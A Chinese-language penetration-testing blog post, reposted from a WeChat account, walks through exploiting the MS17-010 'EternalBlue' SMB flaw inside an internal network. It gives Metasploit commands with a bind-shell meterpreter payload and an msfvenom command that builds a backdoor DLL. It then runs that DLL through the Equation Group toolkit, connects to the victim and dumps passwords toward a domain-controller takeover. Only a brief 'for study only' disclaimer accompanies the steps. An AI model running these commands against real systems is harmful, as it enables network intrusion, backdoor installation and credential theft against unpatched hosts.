内网常见漏洞之永恒之蓝

admin 2023年2月21日12:35:48评论162 views字数 1146阅读3分49秒阅读模式

欢迎转发,请勿抄袭

        永恒之蓝,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。

        在内网中经常能见到这个漏洞,在没有杀软的情况下且未打补丁的情况下。这个漏洞将是打穿内网的一个突破口。常见存在的系统有xp、2003、2008、2012、win7。

常规手段,进入内网后,上传fscan进行扫描,会显示一些漏洞信息,如下存在ms17-010

[+] 172.16.122.151  MS17-010  (Windows 7 Ultimate 7601 Service Pack 1)

使用msf进行正向攻击

proxychains msfconsoleuse exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcp(使用正向payload)set RHost 172.16.122.151set LPORT 8888run

执行完之后,就已经发起攻击了。

内网常见漏洞之永恒之蓝

显然,漏洞存在,但是没利用成功!出现这样情况多半是payload过去了,但是没能正常执行。那么尝试使用方程式进行利用。

先使用msf生成一个dll文件,作为攻击生成的后门。

msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=4444 -f dll >x64.dll

并使用方程式工具检测该漏洞,并且是存在该漏洞。

内网常见漏洞之永恒之蓝

将生成的dll文件复制到方程式工具下,进行利用测试,发现是可以利用成功的。

内网常见漏洞之永恒之蓝

        使用msf进行正向连接受害机器。

proxychains msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcp(使用正向payload)set RHost 172.16.122.151set LPORT 4444(与前面dll设置的端口对应)run

    进行连接测试。

内网常见漏洞之永恒之蓝

        已经可以正常连接,这里需要注意的是,不能执行shell来获取交互式会话。否则就会。

内网常见漏洞之永恒之蓝

        但是可以执行msf的命令,如读取密码。

内网常见漏洞之永恒之蓝

        很大可能抓到密码,如上就抓到域成员密码。结合域控漏洞利用,最后上一个域控的截图。

内网常见漏洞之永恒之蓝

 总结:一个历史老漏洞,但这能给内网带来被沦陷的灾难!

文章声明:该工具、教程仅供学习参考,请勿非法使用。否则与作者无关!

原文始发于微信公众号(yudays实验室):内网常见漏洞之永恒之蓝

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月21日12:35:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网常见漏洞之永恒之蓝https://cn-sec.com/archives/1271501.html

发表评论

匿名网友 填写信息